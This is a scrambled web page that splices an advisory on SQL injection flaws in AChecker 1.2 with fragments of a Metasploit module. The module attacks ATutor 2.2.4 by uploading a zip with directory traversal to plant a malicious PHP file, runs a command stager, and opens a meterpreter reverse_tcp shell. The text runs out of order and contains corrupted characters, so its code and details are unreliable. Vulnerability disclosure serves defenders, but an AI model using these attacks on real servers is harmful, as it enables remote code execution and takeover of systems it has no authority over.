![]() ![]() Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic Tested on: Microsoft Windows XP Professional SP3 (EN) $myown_patch_id) ģ5: $savant->assign('patch_row', $myownPatchesDAO->getByID($myown_patch_id)) ģ6: $savant->assign('dependent_rows', $myownPatchesDependentDAO->getByPatchID($myown_patch_id)) ģ7: $savant->assign('file_rows', $myownPatchesFilesDAO->getByPatchID($myown_patch_id)) ġ03: if (isset($_GET)) // edit existing userġ06: $savant->assign('user_row', $usersDAO->getUserByID($_GET)) ġ07: $savant->assign('show_password', false) SQL queries by injecting arbitrary SQL code.Ģ0: if (!isset($_REQUEST))Ģ6: $myown_patch_id = $_REQUEST Ģ8: $myownPatchesDAO = new MyownPatchesDAO() Ģ9: $myownPatchesDependentDAO = new MyownPatchesDependentDAO() ģ0: $myownPatchesFilesDAO = new MyownPatchesFilesDAO() ģ3: $savant->assign('url', dirname($_SERVER). Sanitised before being used in SQL queries. ![]() It can be used to review the accessibility of Web pages based on a varietyĭesc: Input passed via the parameter 'myown_patch_id' in '/updater/patch_edit.php'Īnd the parameter 'id' in '/user/user_create_edit.php' script is not properly Summary: AChecker is an open source Web accessibility evaluation tool. Vendor: ATutor (Inclusive Design Institute) Print_warning('Failed to obtain a session when exploiting `Import New Language`.')Įxecute_cmdstager(background: true, flavor: temp: '.AChecker 1.2 Multiple Error-Based SQL Injection vulnerabilities Print_status("Executing payload via = 'linux'Įxecute_cmdstager(background: true, flavor: temp: './')Įxecute_cmdstager(background: true, flavor: The only way to know whether or not the exploit succeeded, is by checking if a session was created If that fails, it tries to exploit `Patcher` # The module first attempts to exploit `Import New Language`. # There are two vulnerable functions, the `Import New Language` function and the `Patcher` function # NOTE: Automatic check is implemented by the AutoCheck mixin Print_good("Identified the target OS as #) When 'CentOS', 'Debian', 'Fedora', 'Ubuntu', = targetsįail_with(Failure::NoTarget, 'No valid target for target OS') Target_os = ('(').split(')')įail_with(Failure::NoTarget, 'Unable to determine target OS') unless target_os # Apache probably supports more OS keys, which can be added to the array # By default, the Apache server header reveals the target OS using one of the strings used as keys in the hash below # The ATutor documentation recommends installing it on a XAMPP server. Print_warning('Could not detect target OS.') ![]() 'WfsDelay' => 3 # If exploitation via `Import New Language` doesn't work, wait this long before attempting exploiting via `Patcher` 'PAYLOAD' => 'windows/圆4/meterpreter/reverse_tcp' 'PAYLOAD' => 'linux/圆4/meterpreter/reverse_tcp' Has been successfully tested against ATutor 2.2.4 running on Windows 10 Valid credentials for an ATutor admin account are required. Zip archive and attempts exploitation via `Patcher`. If no session is obtained, the module creates another The moduleįirst uploads the archive via `Import New Language` and then attempts toĮxecute the payload via an HTTP GET request to the PHP file in the root `Import New Language` function and the `Patcher` function. The zip archive can be uploaded via two vectors, the The PHP file contains anĮncoded payload that allows for remote command execution on the The zipĪrchive takes advantage of a directory traversal vulnerability that willĬause the PHP file to be dropped in the root server directory (`htdocs`įor Windows and `html` for Linux targets). It first creates a zip archive containing a malicious PHP file. This module exploits an arbitrary file upload vulnerability together withĪ directory traversal flaw in ATutor versions 2.2.4, 2.2.2 and 2.2.1 in Class MetasploitModule 'ATutor 2.2.4 - Directory Traversal / Remote Code Execution, ', ![]()
0 Comments
Leave a Reply. |